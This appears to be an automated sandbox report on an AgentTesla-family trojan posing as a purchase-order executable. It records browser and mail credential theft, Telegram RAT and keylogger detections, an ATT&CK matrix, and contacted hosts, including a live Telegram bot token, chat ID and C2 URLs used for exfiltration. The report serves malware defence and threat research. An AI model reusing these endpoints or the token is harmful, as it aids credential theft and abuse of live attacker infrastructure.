Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	112 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://www.sakkal.comPXF	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.comPXF	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786459331.00000000054A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.typography.netD	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576077
